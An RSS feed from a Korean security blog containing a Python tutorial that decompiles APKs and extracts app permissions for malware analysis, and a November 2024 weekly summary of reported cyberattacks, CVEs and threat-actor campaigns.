<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
  <channel>
    <title>CALL DWORD PTR DS:[a2sembly]</title>
    <link>https://a2sembly.tistory.com/</link>
    <description>정보보안 블로그!</description>
    <language>ko</language>
    <pubDate>Fri, 17 Apr 2026 04:38:19 +0900</pubDate>
    <generator>TISTORY</generator>
    <ttl>100</ttl>
    <managingEditor>a2sembly</managingEditor>
    <image>
      <title>CALL DWORD PTR DS:[a2sembly]</title>
      <url>https://tistory1.daumcdn.net/tistory/4019789/attach/793cec959cbd412f90fbb45882663dc5</url>
      <link>https://a2sembly.tistory.com</link>
    </image>
    <item>
      <title>Python으로 APK 디코드하고 권한 추출하기</title>
      <link>https://a2sembly.tistory.com/70</link>
      <description>&lt;p data-ke-size=&quot;size16&quot;&gt;악성 앱 분석에서 APK가 요구하는 권한을 파악하는 것은 중요합니다. 따라서, APK 파일을 디컴파일하고 AndroidManifest.xml을 분석하는 과정을 반드시 필요합니다. 이번 글에서는 Python과 apktool을 사용해 다수의 APK 파일을 디컴파하고, 앱이 요청하는 권한을 추출하는 방법을 단계별로 설명합니다.&lt;/p&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;1. 필요한 도구 및 환경 설정&lt;/b&gt;  ️&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;다음 도구와 라이브러리가 필요합니다:&lt;/p&gt;
&lt;ol style=&quot;list-style-type: decimal;&quot; data-ke-list-type=&quot;decimal&quot;&gt;
&lt;li&gt;&lt;b&gt;apktool&lt;/b&gt;: APK를 디컴파일하는 데 사용되는 도구입니다. (&lt;a&gt;&lt;span&gt;apktool&lt;/span&gt;&lt;span&gt; 다운로드&lt;/span&gt;&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Python 3.x&lt;/b&gt;: 코드 실행을 위한 프로그래밍 언어&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Pip 설치&lt;/b&gt;&lt;b&gt;&lt;/b&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;pre id=&quot;code_1732022846093&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;pip install xml.etree.ElementTree&lt;/code&gt;&lt;/pre&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;2. 코드 전체 흐름&lt;/b&gt;  &lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;아래는 코드의 주요 흐름입니다:&lt;/p&gt;
&lt;ol style=&quot;list-style-type: decimal;&quot; data-ke-list-type=&quot;decimal&quot;&gt;
&lt;li&gt;&lt;b&gt;APK 디컴파일:&lt;/b&gt; apktool을 사용해 APK를 디컴파일합니다.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;AndroidManifest.xml 파일 찾기:&lt;/b&gt; 디컴파일된 디렉토리에서 파일을 검색합니다.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;권한 분석:&lt;/b&gt; AndroidManifest.xml에서 권한 정보를 읽고, 이를 JSON 형식으로 저장합니다.&lt;/li&gt;
&lt;/ol&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;3. 핵심 코드 분석&lt;/b&gt;  &lt;/h2&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;(1) APK 디컴파일 함수: decode_apk&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;APK 파일을 디컴파일해 결과를 저장할 디렉토리를 생성합니다.&lt;/p&gt;
&lt;pre id=&quot;code_1732022989257&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;def decode_apk(apk_path):
    output_dir = f&quot;{apk_path}_decoded&quot;
    if not os.path.exists(output_dir):
        call(f&quot;java -jar apktool_2.9.3.jar d {apk_path} -o {output_dir}&quot;, shell=True)
    else:
        print(f&quot;Directory {output_dir} already exists. Skipping decoding.&quot;)
    return output_dir&lt;/code&gt;&lt;/pre&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;(2) AndroidManifest.xml 분석: parse_manifest&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;AndroidManifest.xml 파일에서 패키지 이름과 권한을 추출합니다.&lt;/p&gt;
&lt;pre id=&quot;code_1732023052554&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;def parse_manifest(file_path, permissions_dict):
    try:
        tree = ET.parse(file_path)
        root = tree.getroot()
        ns = {'android': '{http://schemas.android.com/apk/res/android}'}
        package_name = root.get('package', 'Unknown Package')
        permissions = root.findall(&quot;.//uses-permission&quot;, ns)
        extracted_permissions = []
        for perm in permissions:
            perm_name = perm.get(f&quot;{ns['android']}name&quot;)
            if perm_name:
                simple_name = perm_name.split('.')[-1]
                description = permissions_dict.get(simple_name, &quot;No description available&quot;)
                extracted_permissions.append({&quot;permission&quot;: simple_name, &quot;description&quot;: description})
        return package_name, extracted_permissions, file_path
    except ET.ParseError:
        return 'Unknown Package', [], file_path&lt;/code&gt;&lt;/pre&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;(3) 코드 실행 결과&lt;/b&gt;  &lt;/h4&gt;
&lt;pre id=&quot;code_1732023089197&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;{
    &quot;com.example.app&quot;: {
        &quot;file_path&quot;: &quot;Result/com.example.app/AndroidManifest.xml&quot;,
        &quot;permissions&quot;: [
            {
                &quot;permission&quot;: &quot;ACCESS_FINE_LOCATION&quot;,
                &quot;description&quot;: &quot;정확한 위치에 접근&quot;
            },
            {
                &quot;permission&quot;: &quot;READ_CONTACTS&quot;,
                &quot;description&quot;: &quot;연락처 읽기&quot;
            }
        ]
    }
}&lt;/code&gt;&lt;/pre&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;Reference&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;상세 코드는 아래 Github URL에서 확인할 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://github.com/a2sembly/AndroidManifest_Parser&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://github.com/a2sembly/AndroidManifest_Parser&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1732023144427&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;object&quot; data-og-title=&quot;GitHub - a2sembly/AndroidManifest_Parser&quot; data-og-description=&quot;Contribute to a2sembly/AndroidManifest_Parser development by creating an account on GitHub.&quot; data-og-host=&quot;github.com&quot; data-og-source-url=&quot;https://github.com/a2sembly/AndroidManifest_Parser&quot; data-og-url=&quot;https://github.com/a2sembly/AndroidManifest_Parser&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/gnEUG/hyXzUgYVEK/cDvQNnUxBk94C3Sw264d30/img.png?width=1200&amp;amp;height=600&amp;amp;face=0_0_1200_600&quot;&gt;&lt;a href=&quot;https://github.com/a2sembly/AndroidManifest_Parser&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://github.com/a2sembly/AndroidManifest_Parser&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/gnEUG/hyXzUgYVEK/cDvQNnUxBk94C3Sw264d30/img.png?width=1200&amp;amp;height=600&amp;amp;face=0_0_1200_600');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;GitHub - a2sembly/AndroidManifest_Parser&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;Contribute to a2sembly/AndroidManifest_Parser development by creating an account on GitHub.&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;github.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>공부/Programming</category>
      <category>Android</category>
      <category>androidmanifest</category>
      <category>apk</category>
      <category>decompile</category>
      <category>악성 앱</category>
      <category>악성 앱 분석</category>
      <category>안드로이드</category>
      <category>오블완</category>
      <category>티스토리챌린지</category>
      <category>파밍</category>
      <category>피싱</category>
      <category>해킹</category>
      <author>a2sembly</author>
      <guid isPermaLink="true">https://a2sembly.tistory.com/70</guid>
      <comments>https://a2sembly.tistory.com/70#entry70comment</comments>
      <pubDate>Tue, 19 Nov 2024 22:33:07 +0900</pubDate>
    </item>
    <item>
      <title>주간 사이버 보안 인텔리전스 요약 (24년 11월)</title>
      <link>https://a2sembly.tistory.com/69</link>
      <description>&lt;p data-ke-size=&quot;size16&quot;&gt;최신 사이버 위협 동향과 관련된 연구를 간략히 요약합니다. 주요 사이버 공격 사례, 취약점, 위협 정보 및 관련 동향을 정리한 내용입니다.&lt;/p&gt;
&lt;hr data-ke-style=&quot;style1&quot; /&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;  주요 공격 및 데이터 유출&lt;/h2&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;1. 메모리얼 병원 및 매너 랜섬웨어 공격&lt;/h3&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;  위치:&lt;/b&gt; 미국 조지아주 베인브리지&lt;/li&gt;
&lt;li&gt;&lt;b&gt;  공격자:&lt;/b&gt; Embargo 랜섬웨어 그룹&lt;/li&gt;
&lt;li&gt;&lt;b&gt;⚠️ 결과:&lt;/b&gt; 전자 의료 기록 시스템 접근 불가, 1.15TB의 데이터 유출 위협.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;2. 영국 Serco 추적 시스템 사이버 공격&lt;/h3&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;  영향:&lt;/b&gt; 교도소 운송 차량 추적 시스템 및 비상 경보 비활성화.&lt;/li&gt;
&lt;li&gt;&lt;b&gt; ️ 원인:&lt;/b&gt; Microlise(소프트웨어 제공업체) 대상 공격.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;3.  ️ SelectBlinds 고객 정보 유출&lt;/h3&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;  내용:&lt;/b&gt; 약 20만 명의 개인 정보 및 결제 정보 도난.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;  기간:&lt;/b&gt; 9개월 동안 웹사이트 체크아웃 페이지에 악성코드 삽입.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr data-ke-style=&quot;style1&quot; /&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt; ️ 주요 취약점 및 패치&lt;/h2&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;1. Cisco URWB Access Points&lt;/h3&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;  취약점 번호:&lt;/b&gt; CVE-2024-20418&lt;/li&gt;
&lt;li&gt;&lt;b&gt;⚡ 위험도:&lt;/b&gt; CVSS 10.0 (심각)&lt;/li&gt;
&lt;li&gt;&lt;b&gt;  내용:&lt;/b&gt; 비인가 원격 공격자가 루트 권한으로 명령 실행 가능.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;2. Aruba 네트워크 액세스 포인트&lt;/h3&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;  취약점 번호:&lt;/b&gt; CVE-2024-42509, CVE-2024-47460&lt;/li&gt;
&lt;li&gt;&lt;b&gt;  내용:&lt;/b&gt; UDP 포트 8211을 통해 비인가 명령 주입 공격 가능.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;3.   안드로이드 보안 업데이트&lt;/h3&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;  내용:&lt;/b&gt; 두 가지 제로데이 취약점(CVE-2024-43093, CVE-2024-43047) 해결.&lt;/li&gt;
&lt;li&gt;&lt;b&gt; ️ 영향:&lt;/b&gt; 권한 상승 및 원격 코드 실행 방지.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr data-ke-style=&quot;style1&quot; /&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;  최신 위협 인텔리전스 보고&lt;/h2&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;1. Rhadamanthys 정보 탈취 캠페인&lt;/h3&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;  캠페인 이름:&lt;/b&gt; &quot;CopyRh(ight)adamantys&quot;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;  기법:&lt;/b&gt; 저작권 침해 주제로 피싱 이메일 발송, 고전적인 머신러닝 기반 OCR 사용.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;2. APT36의 ElizaRAT&lt;/h3&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;  지역:&lt;/b&gt; 인도 대상 공격&lt;/li&gt;
&lt;li&gt;&lt;b&gt; ️ 특징:&lt;/b&gt; Google Drive, Telegram 등 합법적인 클라우드 플랫폼을 활용한 C2 통신.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;3. SteelFox 트로이목마&lt;/h3&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;  내용:&lt;/b&gt; 소프트웨어 활성화 툴로 위장해 정보 탈취 및 암호화폐 채굴 악성코드 배포.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr data-ke-style=&quot;style1&quot; /&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;  주요 사례 연구&lt;/h2&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;INC Ransomware&lt;/h3&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;  산업:&lt;/b&gt; 헬스케어 (북미 지역)&lt;/li&gt;
&lt;li&gt;&lt;b&gt; ️ 기법:&lt;/b&gt; AnyDesk, Mimikatz 등을 이용한 자격 증명 탈취 및 INC 랜섬웨어 실행.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;COZY BEAR(APT29)의 Phishing Campaign&lt;/h3&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;  지역:&lt;/b&gt; 유럽 및 북미&lt;/li&gt;
&lt;li&gt;&lt;b&gt;  내용:&lt;/b&gt; 악성 RDP 파일을 통해 피해자의 로컬 시스템에 침입&lt;/li&gt;
&lt;/ul&gt;
&lt;hr data-ke-style=&quot;style1&quot; /&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;  기타 동향&lt;/h2&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;2.   북한 연계 그룹&lt;/h3&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt; ️ Lazarus(APT38):&lt;/b&gt; 멕시코 암호화폐 회사 대상 공격.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;  ScarCruft(APT37):&lt;/b&gt; Internet Explorer 취약점(CVE-2024-38178) 악용.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr data-ke-style=&quot;style1&quot; /&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;Reference&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://research.checkpoint.com/2024/11th-november-threat-intelligence-report/&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://research.checkpoint.com/2024/11th-november-threat-intelligence-report/&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1731853412613&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;11th November &amp;ndash; Threat Intelligence Report - Check Point Research&quot; data-og-description=&quot;For the latest discoveries in cyber research for the week of 11th November, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES Memorial Hospital and Manor in Bainbridge, Georgia, has been a victim of a ransomware attack that resulte&quot; data-og-host=&quot;research.checkpoint.com&quot; data-og-source-url=&quot;https://research.checkpoint.com/2024/11th-november-threat-intelligence-report/&quot; data-og-url=&quot;https://research.checkpoint.com/2024/11th-november-threat-intelligence-report/&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/vD9TM/hyXzLcAFSS/4s0RYWr7r2XLUBATdVlyMK/img.jpg?width=1024&amp;amp;height=512&amp;amp;face=0_0_1024_512,https://scrap.kakaocdn.net/dn/er34PK/hyXzGWF62y/3lL1OZt04Gk7ssmKxqdDy0/img.jpg?width=1200&amp;amp;height=628&amp;amp;face=0_0_1200_628,https://scrap.kakaocdn.net/dn/b2ppW9/hyXwv9MOXk/ou9z8j81P5OCLrDk424HbK/img.jpg?width=1021&amp;amp;height=580&amp;amp;face=0_0_1021_580&quot;&gt;&lt;a href=&quot;https://research.checkpoint.com/2024/11th-november-threat-intelligence-report/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://research.checkpoint.com/2024/11th-november-threat-intelligence-report/&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/vD9TM/hyXzLcAFSS/4s0RYWr7r2XLUBATdVlyMK/img.jpg?width=1024&amp;amp;height=512&amp;amp;face=0_0_1024_512,https://scrap.kakaocdn.net/dn/er34PK/hyXzGWF62y/3lL1OZt04Gk7ssmKxqdDy0/img.jpg?width=1200&amp;amp;height=628&amp;amp;face=0_0_1200_628,https://scrap.kakaocdn.net/dn/b2ppW9/hyXwv9MOXk/ou9z8j81P5OCLrDk424HbK/img.jpg?width=1021&amp;amp;height=580&amp;amp;face=0_0_1021_580');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;11th November &amp;ndash; Threat Intelligence Report - Check Point Research&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;For the latest discoveries in cyber research for the week of 11th November, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES Memorial Hospital and Manor in Bainbridge, Georgia, has been a victim of a ransomware attack that resulte&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;research.checkpoint.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://www.bitdefender.com/en-us/blog/hotforsecurity/russian-hackers-ukrainian-rdp-phishing-aws&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://www.bitdefender.com/en-us/blog/hotforsecurity/russian-hackers-ukrainian-rdp-phishing-aws&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1731853427575&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;website&quot; data-og-title=&quot;Russian Hackers Target Ukrainian Military and Organizations with RDP Phishing Campaign&quot; data-og-description=&quot;Hacking group Cozy Bear, working under Russia's Foreign Intelligence Service, targeted industry and military in Ukraine using fake AWS domains.&quot; data-og-host=&quot;www.bitdefender.com&quot; data-og-source-url=&quot;https://www.bitdefender.com/en-us/blog/hotforsecurity/russian-hackers-ukrainian-rdp-phishing-aws&quot; data-og-url=&quot;https://www.bitdefender.com/en-us/blog/hotforsecurity/russian-hackers-ukrainian-rdp-phishing-aws&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/bEqLVa/hyXzNVK3Sm/x2FqPgKFoc543VGKfxObLk/img.jpg?width=1920&amp;amp;height=1280&amp;amp;face=0_0_1920_1280,https://scrap.kakaocdn.net/dn/cATpSu/hyXzTuUsOc/LwvxSr9bapS0Sv0cHfPz30/img.jpg?width=1920&amp;amp;height=1280&amp;amp;face=0_0_1920_1280,https://scrap.kakaocdn.net/dn/cpU4j2/hyXzPTBlkl/eiopxRTPg1zFaNH3GA2GsK/img.jpg?width=600&amp;amp;height=400&amp;amp;face=0_0_600_400&quot;&gt;&lt;a href=&quot;https://www.bitdefender.com/en-us/blog/hotforsecurity/russian-hackers-ukrainian-rdp-phishing-aws&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.bitdefender.com/en-us/blog/hotforsecurity/russian-hackers-ukrainian-rdp-phishing-aws&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/bEqLVa/hyXzNVK3Sm/x2FqPgKFoc543VGKfxObLk/img.jpg?width=1920&amp;amp;height=1280&amp;amp;face=0_0_1920_1280,https://scrap.kakaocdn.net/dn/cATpSu/hyXzTuUsOc/LwvxSr9bapS0Sv0cHfPz30/img.jpg?width=1920&amp;amp;height=1280&amp;amp;face=0_0_1920_1280,https://scrap.kakaocdn.net/dn/cpU4j2/hyXzPTBlkl/eiopxRTPg1zFaNH3GA2GsK/img.jpg?width=600&amp;amp;height=400&amp;amp;face=0_0_600_400');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;Russian Hackers Target Ukrainian Military and Organizations with RDP Phishing Campaign&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;Hacking group Cozy Bear, working under Russia's Foreign Intelligence Service, targeted industry and military in Ukraine using fake AWS domains.&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.bitdefender.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://www.picussecurity.com/resource/blog/understanding-and-mitigating-midnight-blizzards-rdp-based-spearphishing-campaign&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://www.picussecurity.com/resource/blog/understanding-and-mitigating-midnight-blizzards-rdp-based-spearphishing-campaign&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1731853442153&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;Understanding and Mitigating Midnight Blizzard's RDP-Based Spear Phishing Campaign&quot; data-og-description=&quot;Midnight Blizzard's spear-phishing campaign uses malicious RDP files to target sectors like government, defense, and academia. Learn about the attack and mitigation steps.&quot; data-og-host=&quot;www.picussecurity.com&quot; data-og-source-url=&quot;https://www.picussecurity.com/resource/blog/understanding-and-mitigating-midnight-blizzards-rdp-based-spearphishing-campaign&quot; data-og-url=&quot;https://www.picussecurity.com/resource/blog/understanding-and-mitigating-midnight-blizzards-rdp-based-spearphishing-campaign&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/cWeHeu/hyXzTuUsWY/kP3ZBwurSjYugLRb0LUqR0/img.png?width=835&amp;amp;height=525&amp;amp;face=302_39_350_91,https://scrap.kakaocdn.net/dn/sLLeV/hyXzNhbpWW/WAZPqF9q1MMJ5TCJ8W0LJ1/img.png?width=835&amp;amp;height=525&amp;amp;face=302_39_350_91,https://scrap.kakaocdn.net/dn/SocVE/hyXwuJ6VlS/yuPe1UULmeZRACfEULMLD0/img.png?width=572&amp;amp;height=532&amp;amp;face=0_0_572_532&quot;&gt;&lt;a href=&quot;https://www.picussecurity.com/resource/blog/understanding-and-mitigating-midnight-blizzards-rdp-based-spearphishing-campaign&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.picussecurity.com/resource/blog/understanding-and-mitigating-midnight-blizzards-rdp-based-spearphishing-campaign&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/cWeHeu/hyXzTuUsWY/kP3ZBwurSjYugLRb0LUqR0/img.png?width=835&amp;amp;height=525&amp;amp;face=302_39_350_91,https://scrap.kakaocdn.net/dn/sLLeV/hyXzNhbpWW/WAZPqF9q1MMJ5TCJ8W0LJ1/img.png?width=835&amp;amp;height=525&amp;amp;face=302_39_350_91,https://scrap.kakaocdn.net/dn/SocVE/hyXwuJ6VlS/yuPe1UULmeZRACfEULMLD0/img.png?width=572&amp;amp;height=532&amp;amp;face=0_0_572_532');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;Understanding and Mitigating Midnight Blizzard's RDP-Based Spear Phishing Campaign&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;Midnight Blizzard's spear-phishing campaign uses malicious RDP files to target sectors like government, defense, and academia. Learn about the attack and mitigation steps.&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.picussecurity.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://research.checkpoint.com/2024/the-evolution-of-transparent-tribes-new-malware/&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://research.checkpoint.com/2024/the-evolution-of-transparent-tribes-new-malware/&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1731853892879&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;Cloudy With a Chance of RATs: Unveiling APT36 and the Evolution of ElizaRAT - Check Point Research&quot; data-og-description=&quot;Recent cyber attacks by Transparent Tribe, or APT36, utilize increasingly sophisticated malware called ElizaRAT&quot; data-og-host=&quot;research.checkpoint.com&quot; data-og-source-url=&quot;https://research.checkpoint.com/2024/the-evolution-of-transparent-tribes-new-malware/&quot; data-og-url=&quot;https://research.checkpoint.com/2024/the-evolution-of-transparent-tribes-new-malware/&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/692fM/hyXzRRp3r0/eykNZWZAIGJmgrXTkcKPlk/img.jpg?width=1600&amp;amp;height=917&amp;amp;face=0_0_1600_917,https://scrap.kakaocdn.net/dn/IjDbR/hyXzT9xhiR/YBh6xSF4xUxYLDEKWLqol0/img.jpg?width=1600&amp;amp;height=917&amp;amp;face=0_0_1600_917,https://scrap.kakaocdn.net/dn/jKd3V/hyXzTuUzA5/OBaVXK3dlJMmQThYB0ckM0/img.png?width=813&amp;amp;height=340&amp;amp;face=0_0_813_340&quot;&gt;&lt;a href=&quot;https://research.checkpoint.com/2024/the-evolution-of-transparent-tribes-new-malware/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://research.checkpoint.com/2024/the-evolution-of-transparent-tribes-new-malware/&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/692fM/hyXzRRp3r0/eykNZWZAIGJmgrXTkcKPlk/img.jpg?width=1600&amp;amp;height=917&amp;amp;face=0_0_1600_917,https://scrap.kakaocdn.net/dn/IjDbR/hyXzT9xhiR/YBh6xSF4xUxYLDEKWLqol0/img.jpg?width=1600&amp;amp;height=917&amp;amp;face=0_0_1600_917,https://scrap.kakaocdn.net/dn/jKd3V/hyXzTuUzA5/OBaVXK3dlJMmQThYB0ckM0/img.png?width=813&amp;amp;height=340&amp;amp;face=0_0_813_340');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;Cloudy With a Chance of RATs: Unveiling APT36 and the Evolution of ElizaRAT - Check Point Research&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;Recent cyber attacks by Transparent Tribe, or APT36, utilize increasingly sophisticated malware called ElizaRAT&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;research.checkpoint.com&lt;/p&gt;
&lt;/div&gt;
